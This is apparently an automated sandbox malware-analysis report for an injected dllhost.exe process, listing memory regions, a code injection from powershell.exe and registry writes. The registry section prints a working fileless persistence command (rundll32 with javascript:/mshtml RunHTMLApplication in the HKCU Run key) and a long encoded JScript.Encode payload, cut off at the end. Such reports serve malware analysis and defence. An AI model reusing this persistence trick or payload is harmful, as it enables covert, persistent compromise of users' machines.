  • NT AUTHORITY\Logon Session 00000000:0000f4f9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 26C
0x 718
0x 320
0x 310
0x 740
0x 47C
0x 480
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
  • Region Actions
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000060000 0x00060000 0x00063fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True True False
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable True False False
  • Region Actions
windowsshell.manifest 0x000c0000 0x000c0fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable True False False
  • Region Actions
index.dat 0x000e0000 0x000ebfff Memory Mapped File Readable, Writable True False False
  • Region Actions
index.dat 0x000f0000 0x000f7fff Memory Mapped File Readable, Writable True False False
  • Region Actions
index.dat 0x00100000 0x0010ffff Memory Mapped File Readable, Writable True False False
  • Region Actions
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000190000 0x00190000 0x001bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x00370000 0x003d6fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000003e0000 0x003e0000 0x00567fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000005a0000 0x005a0000 0x005affff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000005b0000 0x005b0000 0x00730fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000740000 0x00740000 0x0086ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000740000 0x00740000 0x0081efff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000830000 0x00830000 0x0086ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000870000 0x00870000 0x0099ffff Private Memory Readable, Writable True True False
private_0x0000000000870000 0x00870000 0x008effff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000890000 0x00890000 0x008cffff Private Memory Readable, Writable True True False
private_0x0000000000900000 0x00900000 0x0093ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000960000 0x00960000 0x0099ffff Private Memory Readable, Writable True False False
  • Region Actions
dllhost.exe 0x00a50000 0x00a54fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001e60000 0x01e60000 0x0418cfff Private Memory Readable, Writable, Executable True False False
  • Region Actions
sortdefault.nls 0x04190000 0x0445efff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000004460000 0x04460000 0x0466ffff Private Memory Readable, Writable True True False
private_0x00000000044b0000 0x044b0000 0x044effff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004550000 0x04550000 0x0458ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000045c0000 0x045c0000 0x045fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004630000 0x04630000 0x0466ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004670000 0x04670000 0x0486ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004670000 0x04670000 0x0481ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004670000 0x04670000 0x047fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004810000 0x04810000 0x0481ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004830000 0x04830000 0x0486ffff Private Memory Readable, Writable True False False
  • Region Actions
dnsapi.dll 0x73960000 0x739a3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x73fd0000 0x7404ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x74190000 0x741ebfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x741f0000 0x7422efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x74260000 0x74267fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntmarta.dll 0x75430000 0x75450fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x754b0000 0x754b5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x754c0000 0x754f7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winrnr.dll 0x75500000 0x75507fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x75510000 0x75521fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x75530000 0x7553ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nlaapi.dll 0x75540000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wshtcpip.dll 0x75550000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
comctl32.dll 0x75560000 0x756fdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x75700000 0x7570afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
userenv.dll 0x75710000 0x75726fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x75730000 0x7576bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x75770000 0x75776fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x75780000 0x7579bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x757c0000 0x7581ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75820000 0x75854fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x75860000 0x7590bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iertutil.dll 0x759a0000 0x75b9afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x75ba0000 0x75c9ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x75ca0000 0x768e9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x768f0000 0x7697ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imagehlp.dll 0x76b00000 0x76b29fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
lpk.dll 0x76b40000 0x76b49fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x76b50000 0x76beffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x76bf0000 0x76cdffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x76ce0000 0x76d6efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x76d70000 0x76db5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
usp10.dll 0x76dc0000 0x76e5cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x76ee0000 0x76ef8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x76f00000 0x7700ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wldap32.dll 0x771c0000 0x77204fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x77210000 0x7736bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x77370000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x77470000 0x774cffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
urlmon.dll 0x77590000 0x776c5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x776d0000 0x776d5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x776e0000 0x77736fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x77740000 0x7785cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000077860000 0x77860000 0x77959fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
private_0x0000000077960000 0x77960000 0x77a7efff Private Memory Readable, Writable, Executable True False False
  • Region Actions
ntdll.dll 0x77a80000 0x77c28fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x77c30000 0x77c3bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77c60000 0x77ddffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
  • Region Actions
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0x174 address = 0x60000, size = 15108 True 1
Fn
Data
Modify Control Flow #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0x174 os_tid = 0x26c, address = 0x60000 True 1
Fn
Host Behavior
Registry (33)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 3
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 6
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 2
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = 35 True 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = s, data = 0 False 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 6
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 